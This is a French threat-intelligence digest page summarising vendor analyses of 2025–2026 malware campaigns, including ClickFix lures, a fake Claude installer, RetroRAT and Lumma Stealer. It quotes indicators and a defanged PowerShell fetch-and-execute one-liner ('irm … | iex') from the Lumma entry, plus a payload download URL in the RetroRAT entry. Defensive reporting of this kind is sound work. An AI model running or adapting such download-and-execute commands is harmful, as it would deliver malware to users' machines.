Campagne de phishing ClickFix utilisant un faux installateur Claude (AI) pour déployer un infostealer

🔍 Contexte Rapid7 a publiĂ© le 16 avril 2026 une analyse technique d’une campagne de phishing de type ClickFix dĂ©tectĂ©e le 9 avril 2026 auprĂšs de clients situĂ©s dans l’Union EuropĂ©enne et aux États-Unis. La campagne prĂ©sentait peu de visibilitĂ© sur VirusTotal au moment de sa dĂ©couverte. 🎯 Vecteur d’attaque La campagne se distingue par l’usurpation de l’identitĂ© de Claude, l’assistant IA d’Anthropic. Un faux installateur MSIX (claude.msixbundle) Ă©tait servi depuis le domaine download-version[.]1-5-8[.]com. L’exĂ©cution initiale passait par mshta lancĂ© via l’utilitaire Windows Run, enregistrĂ© dans la clĂ© de registre RunMRU. ...

16 avril 2026 Â· 3 min

Dragon Boss Solutions : un PUP signé déploie un AV killer via un mécanisme de mise à jour détourné

🔍 Contexte PubliĂ© le 15 avril 2026 par Huntress, cet article de recherche dĂ©taille une opĂ©ration malveillante dĂ©couverte le 22 mars 2025, impliquant des logiciels potentiellement indĂ©sirables (PUP) signĂ©s par Dragon Boss Solutions LLC, une entitĂ© enregistrĂ©e Ă  Sharjah, Émirats Arabes Unis, se prĂ©sentant comme spĂ©cialisĂ©e en « search monetization research ». 🎯 MĂ©canisme d’attaque Les exĂ©cutables signĂ©s (ex : RaceCarTwo.exe, ChromsteraUpdater.exe) utilisent Advanced Installer, un mĂ©canisme de mise Ă  jour lĂ©gitime, pour rĂ©cupĂ©rer et exĂ©cuter silencieusement des payloads MSI et PowerShell depuis des serveurs distants. Les fichiers de configuration .ini rĂ©vĂšlent des flags critiques : ...

15 avril 2026 Â· 5 min

Operation DualScript : campagne PowerShell multi-étapes ciblant crypto et finance via RetroRAT

🔍 Contexte Analyse technique publiĂ©e le 31 mars 2026 par Seqrite (Ă©quipe de recherche : Niraj Makasare, Prashil Moon, Rayapati Lakshmi Prasanna Sai). L’investigation a dĂ©butĂ© suite Ă  la dĂ©tection de tĂąches planifiĂ©es Windows suspectes exĂ©cutant des fichiers VBScript depuis des rĂ©pertoires accessibles aux utilisateurs. ⚙ MĂ©canisme d’infection L’attaque repose sur deux chaĂźnes d’exĂ©cution parallĂšles dĂ©clenchĂ©es via des Scheduled Tasks : ChaĂźne 1 : ppamproServiceZuneWAL.vbs → ppamproServiceZuneWAL.ps1 → tĂ©lĂ©chargement de Wallet.txt depuis https://anycourse.net/wp-content/uploads/2025/04/Wallet.txt → exĂ©cution en mĂ©moire d’un hijacker de presse-papiers ciblant 29 cryptomonnaies (BTC, ETH, XMR, etc.) ChaĂźne 2 : PiceVid.vbs → PiceVid.ps1 → dĂ©ploiement en mĂ©moire du RAT RetroRAT via Invoke-Expression 🩠 RetroRAT – Analyse du payload RetroRAT est un Remote Access Trojan financiĂšrement motivĂ© avec les capacitĂ©s suivantes : ...

31 mars 2026 Â· 3 min

Dust Specter (APT prĂ©sumĂ© liĂ© Ă  l’Iran) cible des officiels irakiens avec SPLITDROP/TWINTASK/TWINTALK et GHOSTFORM

Selon ThreatLabz, un acteur APT prĂ©sumĂ© liĂ© Ă  l’Iran, nommĂ© Dust Specter, cible des officiels gouvernementaux en Irak avec une campagne utilisant de nouveaux malwares nommĂ©s SPLITDROP, TWINTASK, TWINTALK et GHOSTFORM. L’analyse dĂ©taille deux chaĂźnes d’attaque observĂ©es en conditions rĂ©elles, l’une basĂ©e sur une architecture scindĂ©e (worker + orchestrateur C2) et l’autre consolidĂ©e dans un binaire unique. đŸ§Ș ChaĂźne d’attaque 1 (SPLITDROP → TWINTASK → TWINTALK). Un RAR protĂ©gĂ© par mot de passe (« mofa-Network-code.rar ») livre un dropper .NET dĂ©guisĂ© en WinRAR (SPLITDROP). AprĂšs saisie du mot de passe, SPLITDROP dĂ©chiffre une ressource chiffrĂ©e en AES‑256‑CBC avec PBKDF2 (HMAC‑SHA1, 10 000 itĂ©rations, clĂ© 256 bits), Ă©crit un ZIP puis extrait dans C:\ProgramData\PolGuid\, et exĂ©cute un VLC.exe lĂ©gitime pour dĂ©clencher un sideloading de DLL. Le DLL malveillant libvlc.dll (TWINTASK) agit comme module worker : il boucle toutes les 15 s, lit in.txt, dĂ©cale le premier caractĂšre, dĂ©code en Base64, et exĂ©cute le script via PowerShell (timeout 600 s), en journalisant vers out.txt. La persistance est ajoutĂ©e via HKCU...\Run (clĂ©s VLC et WingetUI). Le binaire lĂ©gitime WingetUI.exe est lancĂ© et sideloade hostfxr.dll (TWINTALK), l’orchestrateur C2. ...

8 mars 2026 Â· 4 min

Microsoft alerte sur l’abus des redirections OAuth pour du phishing et la livraison de malware

Source et contexte: Microsoft Security Blog (Microsoft Defender Security Research) dĂ©crit des campagnes de phishing exploitant le mĂ©canisme standard de redirection d’OAuth afin de contourner les dĂ©fenses et livrer des malwares, avec des cibles incluant des organisations gouvernementales et du secteur public. RĂ©sumĂ© de la technique: Des applications OAuth malveillantes, créées dans des tenants contrĂŽlĂ©s par l’attaquant, dĂ©clarent des URI de redirection pointant vers des domaines malveillants. Des emails de phishing intĂšgrent des URLs OAuth (Microsoft Entra ID/Google) manipulant notamment prompt=none et des scopes invalides pour provoquer un Ă©chec d’autorisation et une redirection d’erreur vers l’infrastructure de l’attaquant, sans vol de jetons. Le paramĂštre state est dĂ©tournĂ© pour transporter l’email de la victime (en clair, hex, Base64, schĂ©mas custom), et des cadres de phishing tels qu’EvilProxy sont utilisĂ©s aprĂšs redirection. Les leurres incluent e-signatures, sĂ©curitĂ© sociale, finances, politique, ainsi que PDF ou faux .ics de calendrier. ...

5 mars 2026 Â· 3 min

ChaĂźne d’intrusion multistade via malvertising et faux CAPTCHA observĂ©e par Deception.Pro

Selon Deception.Pro, des chercheurs ont observĂ© durant une opĂ©ration de 12 jours une chaĂźne d’intrusion Ă  haute sĂ©vĂ©ritĂ© initiĂ©e par du malvertising et un faux CAPTCHA de type ClickFix. ‱ Le leurre incitait la victime Ă  coller une commande obfusquĂ©e dans la boĂźte de dialogue Windows Run, dĂ©clenchant une exĂ©cution emboĂźtĂ©e de cmd.exe. L’attaque testait la connectivitĂ© sortante via finger.exe (TCP/79), puis rĂ©cupĂ©rait depuis l’infrastructure attaquante un fichier se faisant passer pour un “PDF”, qui s’est avĂ©rĂ© ĂȘtre une archive compressĂ©e extraite localement avec les outils Windows. ...

2 mars 2026 Â· 2 min

Campagne ClickFix: livraison de MIMICRAT via des sites légitimes compromis

Source: Elastic Security Labs (billet technique) — Les chercheurs dĂ©taillent une campagne ClickFix toujours active identifiĂ©e dĂ©but fĂ©vrier 2026, utilisant des sites web lĂ©gitimes compromis pour livrer une chaĂźne d’infection en cinq Ă©tapes culminant avec MIMICRAT, un cheval de Troie d’accĂšs Ă  distance sur mesure. ‱ Vecteur et leurre: la campagne compromet des sites de confiance (bincheck.io et investonline.in) pour injecter un JavaScript qui affiche une fausse vĂ©rification Cloudflare et pousse l’utilisateur Ă  coller/exec un one-liner PowerShell depuis le presse‑papiers. Le leurre est localisĂ© en 17 langues et a touchĂ© des victimes dans plusieurs rĂ©gions (dont une universitĂ© aux États‑Unis et des utilisateurs sinophones). ✅ ...

26 fĂ©vrier 2026 Â· 3 min

Trend Micro dĂ©crit une compromission de la chaĂźne d’approvisionnement d’EmEditor

Selon Trend Micro (US), une attaque de type watering hole a compromis la page de tĂ©lĂ©chargement d’EmEditor fin 2025 afin de distribuer un installeur MSI modifiĂ© qui dĂ©ploie un malware multi‑étapes. ‱ Contexte et cible. EmEditor, Ă©diteur de texte populaire (notamment au sein des communautĂ©s de dĂ©veloppeurs japonaises), a publiĂ© un avis de sĂ©curitĂ© fin dĂ©cembre 2025 signalant la compromission de sa page de tĂ©lĂ©chargement. L’objectif des attaquants: diffuser un installeur altĂ©rĂ© dĂ©clenchant discrĂštement une chaĂźne d’infection post‑installation, augmentant la dwell time et les risques de perturbation opĂ©rationnelle. ...

26 janvier 2026 Â· 2 min

Expel décrit une évolution de ClearFake/ClickFix qui héberge ses charges via des smart contracts

Source et contexte: Expel (blog, Marcus Hutchins, 20 janv. 2026) publie une analyse technique de la campagne malware ClearFake/ClickFix, active sur des centaines de sites compromis et axĂ©e sur l’évasion dĂ©fensive. ‱ Ce que fait ClearFake: framework JavaScript malveillant injectĂ© sur des sites piratĂ©s, affichant un faux CAPTCHA “ClickFix” qui incite l’utilisateur Ă  faire Win+R puis Ă  coller/valider une commande, dĂ©clenchant l’infection. La chaĂźne JS est obfusquĂ©e et prĂ©pare des charges ultĂ©rieures. ...

22 janvier 2026 Â· 3 min

Lumma Stealer multiplie les tùches planifiées et accroßt le trafic C2 vers fileless-market[.]cc

Source: billet signĂ© par Brad Duncan (publiĂ© le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer prĂ©sentant un comportement post-infection inhabituel qui gĂ©nĂšre une hausse continue de trafic vers un mĂȘme domaine C2. AprĂšs l’exfiltration des donnĂ©es par Lumma Stealer, l’hĂŽte Windows infectĂ© rĂ©cupĂšre des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisĂ©es pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraĂźnant des requĂȘtes HTTPS rĂ©pĂ©tĂ©es vers hxxps[:]//fileless-market[.]cc/. ...

16 janvier 2026 Â· 2 min
Derniùre mise à jour le: 11 mai 2026 📝